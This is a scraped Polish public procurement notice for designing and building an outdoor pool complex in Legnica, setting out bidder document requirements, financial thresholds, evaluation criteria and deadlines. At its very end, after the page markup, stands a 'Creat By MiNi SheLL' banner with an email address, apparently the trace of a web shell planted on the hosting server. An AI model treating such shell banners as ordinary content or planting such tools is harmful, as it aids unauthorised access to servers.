dokumentów- inne dokumenty; 6) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 6 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie: min. jedną usługę polegającą na wykonaniu dokumentacji projektowej: projektu budowlanego i projektu wykonawczego dla budowy, przebudowy lub modernizacji kompleksu basenów zewnętrznych o powierzchni lustra wody min. 1.000m2, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane wg wzoru - wg załącznika nr 3b do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz, oraz załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie, tj.- referencje lub inne dokumenty wystawione przez podmiot, na rzecz którego usługi te były wykonywane, a przypadku świadczeń okresowych lub ciągłych są wykonywane. W odniesieniu do świadczeń okresowych lub ciągłych nadal wykonywanych referencje lub inne dokumenty potwierdzające ich należyte wykonywanie winno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać ww. dokumentów - oświadczenie Wykonawcy;7) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie robót budowlanych, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 4 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz; 8) oświadczenie, że wskazane w załączniku nr 4 osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają ww. wymagane uprawnienia w rozumieniu ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2018r. poz. 1202 - tekst jednolity) oraz że są wpisane na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ww. ustawy Prawo budowlane i są ubezpieczone od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem przypisanych im funkcji;9) informacje potwierdzające, że osoba wskazana jako kierownik budowy posiada wymagane doświadczenie, polegające na tym, że była kierownikiem budowy lub inspektorem nadzoru na co najmniej 1 zadaniu polegającym na budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych z zastosowaniem technologii foliowania niecek żelbetowych o powierzchni lustra wody min. 400 m2, wraz z informacjami na temat jego kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności oraz informacją o podstawie do dysponowania tą osobą - wg załącznika nr 4 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz; 10) informacje potwierdzające, że osoba wskazana jako kierownik robót sanitarnych posiada wymagane co najmniej 5-letnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień, polegające na tym, że była kierownikiem robót sanitarnych lub inspektorem nadzoru robót sanitarnych na co 1 zadaniu polegającym na budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych o powierzchni lustra wody min. 400m2 wraz z informacjami na temat jego kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności oraz informacją o podstawie do dysponowania tą osobą - wg załącznika nr 4 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz; 11) informacje potwierdzające, że osoba wskazana jako specjalista ds. wykładania niecek basenowych folią PVC informacji potwierdzających, że posiada wymagane doświadczenie zawodowe tj. doświadczenie w kierowaniu zespołem wykładającym niecki basenowe folią PVC na co najmniej dwóch inwestycjach (zadaniach) w obiektach użyteczności publicznej, przy czym:- w co najmniej 1 z w/w inwestycji w zakres zadania wchodziło foliowanie niecki o powierzchni lustra wody min. 400 m2,- co najmniej 1 z w/w inwestycji w zakres zadania wchodziło foliowanie niecki o głębokości w najgłębszym punkcie min. 3,5 mwraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności oraz informacją o podstawie do dysponowania tą osobą - załącznik nr 4 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz;12)oświadczenie Wykonawcy - wskazanie części zamówienia, której wykonanie powierzy podwykonawcom- wg załącznika nr 5 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz;13) gwarancja jakości Wykonawcy - wg załącznika nr 7 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz;14) wypełniony i podpisany kosztorys ofertowy - wg załącznika nr 8 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz,15) oświadczenie - zgoda Wykonawcy na warunki zmian w umowie - wg załącznika nr 9 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz;16) harmonogram rzeczowo-finansowy robót - wg załącznika nr 10 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz;17) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzające wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości min. 15.000.000,00 zł, wystawioną nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć ww. informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, może złożyć inny dokument , który w wystarczający sposób potwierdza spełnianie wyżej opisanego warunku tj. posiadania środków finansowych lub zdolność kredytową w wysokości min. 15.000.000,00 zł;18) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 20.000.000,00 zł. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć ww. dokumentu, Zamawiający dopuszcza złożenie przez Wykonawcę innych dokumentów, które w wystarczający sposób potwierdzą spełnianie powyższego warunku udziału w postępowaniu;19) sprawozdanie finansowe albo jego części, w przypadku gdy sporządzenie sprawozdania wymagane jest przepisami prawa kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również odpowiednio z opinią o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego, innych dokumentów określających na przykład obroty oraz aktywa i zobowiązania - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, potwierdzające, że przychody z bieżącej działalności w zakresie realizacji robót budowlanych wynoszą co najmniej 15.000.000,00 zł rocznie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,20) Wypełniony i podpisany wzór umowy - Rozdział Nr 3 siwz;21) wypełniony i podpisany Formularz cenowy - Rozdział Nr 5 siwz;22) Oświadczenie Wykonawcy w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art.13 lub art. 14 RODO - wg załącznika nr 11 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz;2. W terminie 3 dni od opublikowania przez Zamawiającego na swojej stronie internetowej informacji, o których mowa w art. 86 ust. 5 ustawy Pzp - informacja z otwarcia ofert, Wykonawcy zobowiązani są przekazać Zamawiającemu do siedziby Zamawiającego: SAG Sp. z o.o., Aleja Rzeczypospolitej 116, sekretariat I piętro, 59-220 Legnica- oświadczenie o przynależności lub braku przynależności do grupy kapitałowej- wg załącznika nr 6 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz.W przypadku przynależności do grupy kapitałowej Wykonawca zobowiązany jest do złożenia stosownego oświadczenia wraz z wykazem podmiotów należących do tej grupy kapitałowej. Wykonawca wraz z w.w. oświadczeniem może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">200.000,- PLN</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie specjalisty ds. wykładania niecek basenowych folią PVC- osoba kierująca zespołem wykładającym nieckę folią PCV, zadanie o powierzchni lustra wody min 200 m2 </TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Wydłużenie okresu gwarancji jakości i rękojmi za wady- min. 36 miesięcy- max. 60 miesięcy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>15,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie kierownika budowy - koordynatora: był kierownikiem budowy lub inspektorem nadzoru na co najmniej 1 zadaniu polegającym na budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych o powierzchni lustra wody min. 400m2 </TD><TD style='border: 1px solid black;border-collapse: collapse;'>5,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zakres, charakter zmian oraz warunki wprowadzenia zmian wg załącznika nr 9 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz "Warunki zmian w umowie".</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-09-25</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">14:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com